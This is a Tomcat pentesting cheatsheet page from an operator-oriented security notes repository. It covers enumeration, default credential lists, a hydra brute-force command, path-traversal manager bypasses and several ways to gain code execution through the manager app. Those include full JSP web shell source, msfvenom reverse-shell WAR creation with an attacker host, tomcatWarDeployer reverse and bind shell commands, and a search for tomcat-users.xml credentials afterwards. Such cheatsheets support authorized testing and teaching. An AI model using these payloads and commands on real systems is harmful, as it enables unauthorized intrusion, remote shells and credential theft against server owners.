daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (10651B)


      1 ---
      2 title: "Tomcat"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/tomcat/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/tomcat/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Tomcat
     14 
     15 ## Discovery
     16 
     17 - A standalone/default-style installation often listens on **port 8080**, but production connectors can use any port or sit behind a reverse proxy.
     18 - **Common Tomcat error:**
     19 
     20 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28150%29.png" alt=""><figcaption></figcaption></figure>
     21 
     22 ## Enumeration
     23 
     24 ### **Version identification**
     25 
     26 To find the version of Apache Tomcat, a simple command can be executed:
     27 
     28 ```bash
     29 curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
     30 ```
     31 
     32 This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
     33 
     34 ### **Manager application location**
     35 
     36 Probe for the standard **`/manager`** and **`/host-manager`** applications, while allowing for nonstandard context paths or removal. Modern default configurations do not grant remote management access merely because the application exists.<sup>[[2]](#references)[[5]](#references)</sup>
     37 
     38 ### **Username Enumeration**
     39 
     40 For Tomcat versions older than 6, it's possible to enumerate usernames through:
     41 
     42 ```bash
     43 msf> use auxiliary/scanner/http/tomcat_enum
     44 ```
     45 
     46 ### **Default Credentials**
     47 
     48 The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:<sup>[[1]](#references)</sup>
     49 
     50 - admin:admin
     51 - tomcat:tomcat
     52 - admin:
     53 - admin:s3cr3t
     54 - tomcat:s3cr3t
     55 - admin:tomcat
     56 
     57 These credentials can be tested using:
     58 
     59 ```bash
     60 msf> use auxiliary/scanner/http/tomcat_mgr_login
     61 ```
     62 
     63 Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification.
     64 
     65 ### **Brute-force attack**
     66 
     67 To attempt a brute force attack on the manager directory, one can use:
     68 
     69 ```bash
     70 hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
     71 ```
     72 
     73 Along with setting various parameters in Metasploit to target a specific host.
     74 
     75 ## Common Vulnerabilities
     76 
     77 ### **Password Backtrace Disclosure**
     78 
     79 An application-specific `/auth.jsp` may expose submitted credentials in a verbose exception or backtrace. This is not a standard Tomcat endpoint; treat it as a content-discovery and error-handling check.
     80 
     81 ### **Double URL Encoding**
     82 
     83 In `mod_jk` versions before 1.2.23, CVE-2007-1860 allowed crafted, possibly double-encoded traversal through a prefix `JkMount` to reach protected pages.<sup>[[4]](#references)</sup>
     84 
     85 A historical probe for the management application is: `pathTomcat/%252E%252E/manager/html`.
     86 
     87 ### /examples
     88 
     89 Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)<sup>[[3]](#references)</sup>
     90 
     91 - /examples/jsp/num/numguess.jsp
     92 - /examples/jsp/dates/date.jsp
     93 - /examples/jsp/snp/snoop.jsp
     94 - /examples/jsp/error/error.html
     95 - /examples/jsp/sessions/carts.html
     96 - /examples/jsp/checkbox/check.html
     97 - /examples/jsp/colors/colors.html
     98 - /examples/jsp/cal/login.html
     99 - /examples/jsp/include/include.jsp
    100 - /examples/jsp/forward/forward.jsp
    101 - /examples/jsp/plugin/plugin.jsp
    102 - /examples/jsp/jsptoserv/jsptoservlet.jsp
    103 - /examples/jsp/simpletag/foo.jsp
    104 - /examples/jsp/mail/sendmail.jsp
    105 - /examples/servlet/HelloWorldExample
    106 - /examples/servlet/RequestInfoExample
    107 - /examples/servlet/RequestHeaderExample
    108 - /examples/servlet/RequestParamExample
    109 - /examples/servlet/CookieExample
    110 - /examples/servlet/JndiServlet
    111 - /examples/servlet/SessionExample
    112 - /tomcat-docs/appdev/sample/web/hello.jsp
    113 
    114 ### **Path Traversal Exploit**
    115 
    116 In some [**vulnerable reverse-proxy mappings**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/), path-parameter and normalization differences can expose protected Tomcat directories with a segment such as `/..;/`.<sup>[[6]](#references)</sup>
    117 
    118 So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`
    119 
    120 **Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
    121 
    122 ## RCE
    123 
    124 Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
    125 
    126 ### Limitations
    127 
    128 WAR deployment requires the appropriate Manager role: `manager-gui` for the HTML interface or `manager-script` for the text API used by `curl`. `manager-status` is read-only, while `admin-gui` and `admin-script` belong to the separate Host Manager application. Realm users and roles may be defined in `tomcat-users.xml`, whose path varies by installation (for example, `/usr/share/tomcat9/etc/tomcat-users.xml`).<sup>[[5]](#references)</sup> See [Post-exploitation](#post-exploitation).
    129 
    130 ```bash
    131 # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
    132 
    133 # deploy under "path" context path
    134 curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
    135 
    136 # undeploy
    137 curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
    138 ```
    139 
    140 ### Metasploit
    141 
    142 ```bash
    143 use exploit/multi/http/tomcat_mgr_upload
    144 msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
    145 msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
    146 msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
    147 msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
    148 msf exploit(multi/http/tomcat_mgr_upload) > exploit
    149 ```
    150 
    151 ### MSFVenom Reverse Shell
    152 
    153 1. Create the war to deploy:
    154 
    155 ```bash
    156 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
    157 ```
    158 
    159 2. Upload `revshell.war` and request its deployed context (`/revshell/`).
    160 
    161 ### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
    162 
    163 This may fail on older or incompatible Java runtimes.
    164 
    165 #### Download
    166 
    167 ```bash
    168 git clone https://github.com/mgeeky/tomcatWarDeployer.git
    169 ```
    170 
    171 #### Reverse shell
    172 
    173 ```bash
    174 ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
    175 ```
    176 
    177 #### Bind shell
    178 
    179 ```bash
    180 ./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
    181 ```
    182 
    183 ### Using [Clusterd](https://github.com/hatRiot/clusterd)
    184 
    185 ```bash
    186 clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
    187 ```
    188 
    189 ### Manual method - Web shell
    190 
    191 Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
    192 
    193 ```java
    194 <FORM METHOD=GET ACTION='index.jsp'>
    195 <INPUT name='cmd' type=text>
    196 <INPUT type=submit value='Run'>
    197 </FORM>
    198 <%@ page import="java.io.*" %>
    199 <%
    200    String cmd = request.getParameter("cmd");
    201    String output = "";
    202    if(cmd != null) {
    203       String s = null;
    204       try {
    205          Process p = Runtime.getRuntime().exec(cmd,null,null);
    206          BufferedReader sI = new BufferedReader(new
    207 InputStreamReader(p.getInputStream()));
    208          while((s = sI.readLine()) != null) { output += s+"</br>"; }
    209       }  catch(IOException e) {   e.printStackTrace();   }
    210    }
    211 %>
    212 <pre><%=output %></pre>
    213 ```
    214 
    215 ```bash
    216 mkdir webshell
    217 cp index.jsp webshell
    218 cd webshell
    219 jar -cvf ../webshell.war *
    220 webshell.war is created
    221 # Upload it
    222 ```
    223 
    224 You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
    225 
    226 ### Manual Method 2
    227 
    228 Get a JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file:
    229 
    230 ```bash
    231 wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
    232 zip -r backup.war cmd.jsp
    233 # When this file is uploaded to the manager GUI, the /backup application will be added to the table.
    234 # Go to: http://tomcat-site.local:8180/backup/cmd.jsp
    235 ```
    236 
    237 ## Post-exploitation
    238 
    239 The file-based realm commonly uses `tomcat-users.xml` to define Tomcat users and their roles. Other Realm implementations can store identities elsewhere.
    240 
    241 ```bash
    242 find / -name tomcat-users.xml 2>/dev/null
    243 ```
    244 
    245 Example:
    246 
    247 ```xml
    248 [...]
    249 <!--
    250   By default, no user is included in the "manager-gui" role required
    251   to operate the "/manager/html" web application.  If you wish to use this app,
    252   you must define such a user - the username and password are arbitrary.
    253 
    254   Built-in Tomcat manager roles:
    255     - manager-gui    - allows access to the HTML GUI and the status pages
    256     - manager-script - allows access to the HTTP API and the status pages
    257     - manager-jmx    - allows access to the JMX proxy and the status pages
    258     - manager-status - allows access to the status pages only
    259 -->
    260 [...]
    261 <role rolename="manager-gui" />
    262 <user username="tomcat" password="tomcat" roles="manager-gui" />
    263 <role rolename="admin-gui" />
    264 <user username="admin" password="admin" roles="manager-gui,admin-gui" />
    265 ```
    266 
    267 ## Other Tomcat scanning tools
    268 
    269 - [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
    270 
    271 ## References
    272 
    273 - [1] [Nexpose / Metasploitable sample scan report (HackerTarget)](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
    274 - [2] [Pentest-Tomcat (simran-sankhala)](https://github.com/simran-sankhala/Pentest-Tomcat)
    275 - [3] [Apache Tomcat example scripts information leaks (Rapid7)](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
    276 - [4] [NVD: CVE-2007-1860 in the Tomcat JK connector](https://nvd.nist.gov/vuln/detail/CVE-2007-1860)
    277 - [5] [Apache Tomcat Manager application documentation](https://tomcat.apache.org/tomcat-11.0-doc/manager-howto.html)
    278 - [6] [Acunetix: Tomcat path traversal via reverse-proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)